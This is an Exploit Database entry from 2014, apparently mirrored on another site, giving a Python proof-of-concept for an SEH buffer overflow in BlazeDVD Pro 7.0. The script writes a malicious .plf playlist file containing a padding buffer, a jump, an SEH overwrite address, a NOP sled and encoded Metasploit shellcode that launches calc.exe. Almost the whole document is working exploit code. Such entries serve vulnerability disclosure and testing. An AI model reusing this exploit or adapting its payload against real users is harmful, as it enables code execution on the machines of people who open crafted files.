BlazeDVD Pro Player 7.0 – ‘.plf’ Local Buffer Overflow (SEH)

• Exploit Database
• 34 阅读

• 作者： metacom
  日期： 2014-08-20
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/34371/

• # BlazeDVD Pro v7.0 - (.plf) Buffer Overflow SEH 
  # Date: 19.08.2014
  # Exploit Author: metacom
  # Vendor Homepage: http://www.blazevideo.com/
  # Software Link: http://www.blazevideo.com/download/BlazeDVDProSetup.exe
  # Version: 7.0.0.0
  # Tested on: Win 7 EN, Win 8.1 
  
  
  #!/usr/bin/python
  
  from struct import pack
   
  buffer= "\x41" * 608
  nseh="\xeb\x06\xff\xff" 
  seh=pack("<I", 0x6030F817) #6030F8175E POP ESI Configuration.dll
  nops="\x90" * 50
  # msfpayload windows/exec CMD=calc.exe R |
  # msfencode -e x86/alpha_mixed -c 1 -b '\x00\x0a\x0d\xff'
  shell=("\xdb\xcd\xd9\x74\x24\xf4\x5f\x57\x59\x49\x49\x49\x49\x49" 
  "\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a" 
  "\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41" 
  "\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42" 
  "\x75\x4a\x49\x69\x6c\x6b\x58\x4f\x79\x55\x50\x75\x50\x35" 
  "\x50\x33\x50\x4b\x39\x49\x75\x66\x51\x4a\x72\x52\x44\x6e" 
  "\x6b\x70\x52\x44\x70\x6e\x6b\x42\x72\x44\x4c\x4c\x4b\x63" 
  "\x62\x64\x54\x6e\x6b\x42\x52\x54\x68\x34\x4f\x6c\x77\x63" 
  "\x7a\x35\x76\x65\x61\x4b\x4f\x74\x71\x4f\x30\x6c\x6c\x65" 
  "\x6c\x71\x71\x53\x4c\x46\x62\x76\x4c\x37\x50\x49\x51\x68" 
  "\x4f\x76\x6d\x57\x71\x6b\x77\x7a\x42\x7a\x50\x32\x72\x42" 
  "\x77\x4c\x4b\x42\x72\x44\x50\x6c\x4b\x31\x52\x37\x4c\x55" 
  "\x51\x7a\x70\x4c\x4b\x33\x70\x62\x58\x4f\x75\x6b\x70\x51" 
  "\x64\x52\x6a\x77\x71\x78\x50\x42\x70\x4c\x4b\x52\x68\x47" 
  "\x68\x4c\x4b\x46\x38\x37\x50\x77\x71\x5a\x73\x58\x63\x55" 
  "\x6c\x53\x79\x4e\x6b\x66\x54\x4c\x4b\x73\x31\x38\x56\x75" 
  "\x61\x59\x6f\x36\x51\x59\x50\x4c\x6c\x6a\x61\x4a\x6f\x34" 
  "\x4d\x46\x61\x79\x57\x77\x48\x49\x70\x31\x65\x4b\x44\x65" 
  "\x53\x43\x4d\x6b\x48\x65\x6b\x53\x4d\x64\x64\x53\x45\x6d" 
  "\x32\x73\x68\x6e\x6b\x70\x58\x67\x54\x67\x71\x39\x43\x62" 
  "\x46\x6c\x4b\x76\x6c\x42\x6b\x4e\x6b\x62\x78\x45\x4c\x37" 
  "\x71\x38\x53\x4c\x4b\x46\x64\x4c\x4b\x45\x51\x48\x50\x4c" 
  "\x49\x50\x44\x71\x34\x47\x54\x71\x4b\x31\x4b\x63\x51\x31" 
  "\x49\x63\x6a\x70\x51\x69\x6f\x39\x70\x46\x38\x73\x6f\x53" 
  "\x6a\x4e\x6b\x56\x72\x58\x6b\x4b\x36\x31\x4d\x42\x4a\x55" 
  "\x51\x4c\x4d\x4d\x55\x38\x39\x65\x50\x65\x50\x65\x50\x56" 
  "\x30\x62\x48\x75\x61\x4c\x4b\x62\x4f\x4f\x77\x79\x6f\x49" 
  "\x45\x6f\x4b\x5a\x50\x6c\x75\x4d\x72\x36\x36\x42\x48\x59" 
  "\x36\x4a\x35\x4d\x6d\x6d\x4d\x49\x6f\x49\x45\x45\x6c\x45" 
  "\x56\x43\x4c\x76\x6a\x4f\x70\x39\x6b\x4b\x50\x42\x55\x36" 
  "\x65\x4d\x6b\x51\x57\x44\x53\x62\x52\x50\x6f\x62\x4a\x77" 
  "\x70\x56\x33\x6b\x4f\x4a\x75\x35\x33\x35\x31\x72\x4c\x33" 
  "\x53\x74\x6e\x32\x45\x43\x48\x75\x35\x37\x70\x41\x41")
  
  poc = buffer + nseh + seh + nops + shell
  try:
  out_file = open("BlazeDVD.plf",'w')
  out_file.write(poc)
  out_file.close()
  print("[*] Malicious plf file created successfully")
  except:
  print "[!] Error creating file"